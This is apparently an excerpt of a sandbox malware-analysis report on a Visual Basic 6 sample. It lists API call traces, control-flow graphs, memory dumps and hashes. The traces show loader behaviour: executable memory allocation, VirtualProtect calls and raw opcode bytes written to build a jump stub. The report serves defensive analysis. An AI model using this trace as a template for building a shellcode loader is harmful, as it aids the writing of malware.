                                                                    • __vbaAryLock.MSVBVM60(?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9B6
                                                                    • __vbaStrCat.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9DB
                                                                    • __vbaStrMove.MSVBVM60(0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9E5
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054F9EB
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A804,0040A7FC,?,00000000,?,0040A7DC,?,0040A7D0,00000040), ref: 0054FA05
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A7DC,0000002C), ref: 0054FA25
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054FA37
                                                                    • __vbaFreeStr.MSVBVM60(?), ref: 0054FA3F
                                                                    • #644.MSVBVM60(?,?), ref: 0054FA48
                                                                    • __vbaStrCat.MSVBVM60(0040AF80,0040AF78,?,?), ref: 0054FA5A
                                                                    • __vbaStrMove.MSVBVM60(0040AF80,0040AF78,?,?), ref: 0054FA64
                                                                    • __vbaStrCat.MSVBVM60(0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FA6F
                                                                    • #638.MSVBVM60(00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FA89
                                                                    • __vbaFreeStr.MSVBVM60(00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FA9C
                                                                    • __vbaFreeVar.MSVBVM60(00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FAA4
                                                                    • __vbaAryLock.MSVBVM60(?,0040A7DC,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FADF
                                                                    • #644.MSVBVM60(?,?,0040A7DC,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FAF7
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0040A7DC,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FB03
                                                                    • #644.MSVBVM60(0424448B,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FB28
                                                                    • #644.MSVBVM60(408B008B,-00000004,?,00000004,0424448B,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80,0040AF78,?,?), ref: 0054FB4C
                                                                    • #644.MSVBVM60(20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A7DC,00000000,0040A7DC,00000008,0040B194,00000000,0040AF80), ref: 0054FB70
                                                                    • #644.MSVBVM60(E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A7DC,00000000,0040A7DC), ref: 0054FB94
                                                                    • #644.MSVBVM60(0000E0FF,-00000010,?,00000004,E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004), ref: 0054FBB8
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,-00000014,?,00000004,0000E0FF,-00000010), ref: 0054FC1B
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A7DC,00000020), ref: 0054FC3B
                                                                    • __vbaAryLock.MSVBVM60(?,0040A7DC,0040A7DC), ref: 0054FC85
                                                                    • #644.MSVBVM60(?,?,0040A7DC,0040A7DC), ref: 0054FC9D
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0040A7DC,0040A7DC), ref: 0054FCA9
                                                                    • #644.MSVBVM60(0040A7CC,0040A7DC), ref: 0054FCC7
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054FD24,0000E0FF,00000000,0040A7CC,0040A7DC), ref: 0054FD13
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,0040A7DC,00000000,?,0054FD24,0000E0FF,00000000,0040A7CC,0040A7DC), ref: 0054FD1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Free$LockUnlock$Addref$CheckDestructHresultMoveProtectRedimVirtual$#638CastChkstkList
                                                                    • String ID: @
                                                                    • API String ID: 1659925571-2766056989
                                                                    • Opcode ID: 0302eee18d80d4fdf7390a8f0bd3a0254f92e5ed1ff3cfe3e5726232edf4c478
                                                                    • Instruction ID: 0a2f4aec0a52663139c64dd3e890d317dd5eae52165ebca090b61dab330a896e
                                                                    • Opcode Fuzzy Hash: 0302eee18d80d4fdf7390a8f0bd3a0254f92e5ed1ff3cfe3e5726232edf4c478
                                                                    • Instruction Fuzzy Hash: E302B8B5D00209AFDF00EFE5C985EEEBBB9FB08308F14442AF501BB2A1D77999558B54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 470 54e01f-54e072 __vbaChkstk __vbaVarVargNofree __vbaStrVarCopy __vbaStrMove 471 54e074-54e083 call 54b161 470->471 472 54e086-54e08a 470->472 471->472 473 54e0a2-54e0a5 472->473 474 54e08c-54e0a0 __vbaNew2 472->474 476 54e0a8-54e0c8 473->476 474->476 479 54e0e1 476->479 480 54e0ca-54e0df __vbaHresultCheckObj 476->480 481 54e0e5-54e130 __vbaStrToAnsi call 40ac80 __vbaSetSystemError __vbaFreeStrList 479->481 480->481 484 54e136-54e13a 481->484 485 54e347-54e3f6 call 40abd0 __vbaSetSystemError __vbaLenBstr __vbaStrToAnsi call 40adc0 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr call 40aad0 __vbaSetSystemError __vbaAryLock call 40ab50 481->485 486 54e152-54e155 484->486 487 54e13c-54e150 __vbaNew2 484->487 502 54e3fb-54e426 __vbaSetSystemError __vbaAryUnlock __vbaRedimPreserve 485->502 489 54e158-54e178 486->489 487->489 494 54e191 489->494 495 54e17a-54e18f __vbaHresultCheckObj 489->495 497 54e195-54e1ac __vbaStrToAnsi call 40ac80 494->497 495->497 501 54e1b1-54e1e0 __vbaSetSystemError __vbaFreeStrList 497->501 501->485 503 54e1e6-54e1ea 501->503 504 54e42b-54e45e __vbaFreeObj __vbaFreeStr 502->504 505 54e202-54e205 503->505 506 54e1ec-54e200 __vbaNew2 503->506 508 54e208-54e228 505->508 506->508 510 54e241 508->510 511 54e22a-54e23f __vbaHresultCheckObj 508->511 512 54e245-54e290 __vbaStrToAnsi call 40ac80 __vbaSetSystemError __vbaFreeStrList 510->512 511->512 512->485 515 54e296-54e29a 512->515 516 54e2b2-54e2b5 515->516 517 54e29c-54e2b0 __vbaNew2 515->517 518 54e2b8-54e2d8 516->518 517->518 520 54e2f1 518->520 521 54e2da-54e2ef __vbaHresultCheckObj 518->521 522 54e2f5-54e340 __vbaStrToAnsi call 40ac80 __vbaSetSystemError __vbaFreeStrList 520->522 521->522 522->485 525 54e342 522->525 525->504
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E03A
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E052
                                                                    • __vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E058
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E062
                                                                    • __vbaNew2.MSVBVM60(004082A0,00000000,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF,?), ref: 0054E095
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,0000001C,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0D7
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3,?,00004008,000000FF), ref: 0054E0F0
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526,?,?,?,0054D5F3), ref: 0054E104
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401526), ref: 0054E122
                                                                    • __vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E145
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,0000001C), ref: 0054E187
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054E1A0
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054E1B4
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054E1D2
                                                                    • __vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E1F5
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,00000020), ref: 0054E237
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000), ref: 0054E250
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 0054E264
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 0054E282
                                                                    • __vbaNew2.MSVBVM60(004082A0,00000000), ref: 0054E2A5
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,00000020), ref: 0054E2E7
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054E300
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054E314
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054E332
                                                                    • __vbaSetSystemError.MSVBVM60(?,00008003,00000000,00000000,?), ref: 0054E35C
                                                                    • __vbaLenBstr.MSVBVM60(?,00000000,?,00008003,00000000,00000000,?), ref: 0054E366
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054E373
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054E384
                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054E390
                                                                    • __vbaFreeStr.MSVBVM60 ref: 0054E3A7
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00006610,00000000,00000000,00000000), ref: 0054E3C5
                                                                    • __vbaAryLock.MSVBVM60(?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054E3D3
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054E3FB
                                                                    • __vbaAryUnlock.MSVBVM60(?,00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054E404
                                                                    • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 0054E41E
                                                                    • __vbaFreeObj.MSVBVM60(0054E45F,?,00000000), ref: 0054E451
                                                                    • __vbaFreeStr.MSVBVM60(0054E45F,?,00000000), ref: 0054E459
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$Free$Ansi$CheckHresultListNew2$BstrChkstkCopyLockMoveNofreePreserveRedimUnicodeUnlockVarg
                                                                    • String ID: _T
                                                                    • API String ID: 1357747868-17957468
                                                                    • Opcode ID: c2c08aa6c3202df87de38de8ccb6c2885ebdc9408102f11a4538190cc72e27a3
                                                                    • Instruction ID: 49ba3707f5f540de73714f7e50ab626a3ebfaa8401d0e1c142f63208a441c64d
                                                                    • Opcode Fuzzy Hash: c2c08aa6c3202df87de38de8ccb6c2885ebdc9408102f11a4538190cc72e27a3
                                                                    • Instruction Fuzzy Hash: 76D1D171D40209AFDF10EBE1CC46BEEBBB8BF08704F14442AF501BB1A1D7799A559B24

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054D618,?,?), ref: 0054DD6D
                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,?,?,00006011,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DDE1
                                                                    • __vbaVarSub.MSVBVM60(?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401526), ref: 0054DDF2
                                                                    • __vbaI4Var.MSVBVM60(00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?,00401526), ref: 0054DDF8
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,00000002,00000000,?,00000002,?,?,00006011,?,?,?,?), ref: 0054DE0A
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE1B
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE31
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE40
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,00401526,?,?,?,0054D618,?,?), ref: 0054DE49
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,00000000,?,?,?,?,?), ref: 0054DE70
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054DE81
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?), ref: 0054DE8D
                                                                    • __vbaSetSystemError.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?), ref: 0054DECC
                                                                    • __vbaAryUnlock.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054DED5
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?), ref: 0054DEDE
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054DEF9
                                                                    • __vbaVarTstEq.MSVBVM60(00008003,?), ref: 0054DF1C
                                                                      • Part of subcall function 0054DCCE: __vbaChkstk.MSVBVM60(?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?,00401526), ref: 0054DCE9
                                                                      • Part of subcall function 0054DCCE: __vbaRefVarAry.MSVBVM60(?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011,?,?,?,?), ref: 0054DCFE
                                                                      • Part of subcall function 0054DCCE: __vbaUbound.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD07
                                                                      • Part of subcall function 0054DCCE: __vbaVarMove.MSVBVM60(00000001,00000000,?,?,?,?,?,00401526,?,?,?,0054DDAA,?,00006011), ref: 0054DD1C
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00008003,?), ref: 0054DF41
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0054DF52
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0054DF68
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 0054DF77
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DF83
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DF99
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DFA8
                                                                    • __vbaFreeVar.MSVBVM60(0054E00A,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054DFF9
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054E00A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054E004
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$LockUnlock$#644$ChkstkFreeMoveRedim$DestructErrorListSystemUbound
                                                                    • String ID:
                                                                    • API String ID: 1237311878-0
                                                                    • Opcode ID: d4d9666b273c8af4bb3b8120a284aacd6727943c3331734659f14b46b7e3dd7d
                                                                    • Instruction ID: d4289f82e5e34e728965eeea200cdb993f31b24a799de9b59a418bf9570b1a82
                                                                    • Opcode Fuzzy Hash: d4d9666b273c8af4bb3b8120a284aacd6727943c3331734659f14b46b7e3dd7d
                                                                    • Instruction Fuzzy Hash: 5C81A9B1D1020CAFDF14EFE5DC46EDEBBB8AF08304F44446AF505EB2A1DA75A9448B64

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C24C
                                                                    • #644.MSVBVM60(?,?,?,?,00401526), ref: 0054C264
                                                                    • #644.MSVBVM60(00000000,?,?,?,?,?,00401526), ref: 0054C289
                                                                    • #644.MSVBVM60(?,?,-00000004,00000000,?,?,?,?,?,00401526), ref: 0054C2A5
                                                                      • Part of subcall function 0054F786: __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C2B9,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054F7A1
                                                                      • Part of subcall function 0054F786: __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401526,?,?,?,0054C2B9), ref: 0054F7C6
                                                                      • Part of subcall function 0054F786: __vbaNew.MSVBVM60(0040A7CC,0040A7DC), ref: 0054F7D8
                                                                      • Part of subcall function 0054F786: __vbaObjSet.MSVBVM60(?,00000000,0040A7CC,0040A7DC), ref: 0054F7E2
                                                                      • Part of subcall function 0054F786: __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7E8
                                                                      • Part of subcall function 0054F786: __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F7F2
                                                                      • Part of subcall function 0054F786: __vbaObjSetAddref.MSVBVM60(005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F801
                                                                      • Part of subcall function 0054F786: __vbaFreeObjList.MSVBVM60(00000002,?,00000000,005C92AC,00000000,?,00000000,00000000,?,00000000,0040A7CC,0040A7DC), ref: 0054F810
                                                                      • Part of subcall function 0054F786: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F824
                                                                      • Part of subcall function 0054F786: #644.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F82A
                                                                      • Part of subcall function 0054F786: __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A7CC,0040A7DC), ref: 0054F835
                                                                      • Part of subcall function 0054F786: __vbaAryLock.MSVBVM60(?,?), ref: 0054F87B
                                                                      • Part of subcall function 0054F786: #644.MSVBVM60(?,?,?), ref: 0054F893
                                                                      • Part of subcall function 0054F786: __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054F89F
                                                                    • __vbaChkstk.MSVBVM60(?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2CB
                                                                      • Part of subcall function 0054C559: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C575
                                                                      • Part of subcall function 0054C559: __vbaVarDup.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C58D
                                                                      • Part of subcall function 0054C559: #644.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C598
                                                                      • Part of subcall function 0054C559: __vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401526), ref: 0054C5A2
                                                                      • Part of subcall function 0054C559: __vbaFreeVar.MSVBVM60(0054C695,00000000,?,00000000,?,00000002,?), ref: 0054C68F
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2E6
                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2F0
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C2F8
                                                                    • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C310
                                                                      • Part of subcall function 0054C559: #697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054C5FE
                                                                      • Part of subcall function 0054C559: __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C619
                                                                      • Part of subcall function 0054C559: __vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C623
                                                                      • Part of subcall function 0054C559: __vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C62B
                                                                      • Part of subcall function 0054C559: __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054C64C
                                                                      • Part of subcall function 0054C559: __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054C656
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C32B
                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C335
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054C33D
                                                                    • __vbaNew2.MSVBVM60(004082A0,00000000,?,?,?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004), ref: 0054C362
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A838,00000024,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054C3C6
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0054C3D7
                                                                    • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0054C3DF
                                                                    • #644.MSVBVM60(?,?), ref: 0054C3EC
                                                                    • #644.MSVBVM60(?,?,?,?), ref: 0054C416
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000008,00000040,?,?,?,?), ref: 0054C436
                                                                    • __vbaFreeStr.MSVBVM60(0054C464,?,?,00000008,00000040,?,?,?,?), ref: 0054C44E
                                                                    • __vbaFreeObj.MSVBVM60(0054C464,?,?,00000008,00000040,?,?,?,?), ref: 0054C456
                                                                    • __vbaFreeStr.MSVBVM60(0054C464,?,?,00000008,00000040,?,?,?,?), ref: 0054C45E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$#644$Move$Chkstk$Addref$#697CastCheckHresultListLockNew2RedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 1321261956-0
                                                                    • Opcode ID: d386b2a2659407077ed9a4f6ce9ac3479629d4122768626c9443982ff507ab4f
                                                                    • Instruction ID: 6055d61974fc2c9b3d1c122a7c00d8d89ed8ea0644231ac08d06271b717b22f1
                                                                    • Opcode Fuzzy Hash: d386b2a2659407077ed9a4f6ce9ac3479629d4122768626c9443982ff507ab4f
                                                                    • Instruction Fuzzy Hash: 1B71E371D00208AFDB00EFA5C946ADDBBB5FF48344F10842AF505BB2A1EB79AA45CF54

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054CB90
                                                                      • Part of subcall function 0054CAB5: __vbaChkstk.MSVBVM60(?,0054C4AF,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054CABB
                                                                    • #644.MSVBVM60(?,005A8456,?,?,?,?,00401526), ref: 0054CBB9
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00000000,00000004,?,005A8456,?,?,?,?,00401526), ref: 0054CBDF
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,?,00000000,00000004,?,005A8456), ref: 0054CBFD
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC0C
                                                                    • #644.MSVBVM60(?,?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC22
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC2E
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,-00000004,?,?,?,?,?,?,005A8456,?,?,?,?,00401526), ref: 0054CC51
                                                                    • #644.MSVBVM60(?,?,?,?,-00000004,?,?,?,?,?,?,005A8456), ref: 0054CC67
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,-00000004,?,?,?,?,?,?,005A8456), ref: 0054CC73
                                                                      • Part of subcall function 0054CACD: __vbaChkstk.MSVBVM60(?,00401526), ref: 0054CAE9
                                                                      • Part of subcall function 0054CACD: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526), ref: 0054CB01
                                                                      • Part of subcall function 0054CACD: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 0054CB0B
                                                                      • Part of subcall function 0054CACD: #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401526), ref: 0054CB11
                                                                      • Part of subcall function 0054CACD: __vbaVarMove.MSVBVM60 ref: 0054CB26
                                                                      • Part of subcall function 0054CACD: __vbaFreeStr.MSVBVM60 ref: 0054CB2E
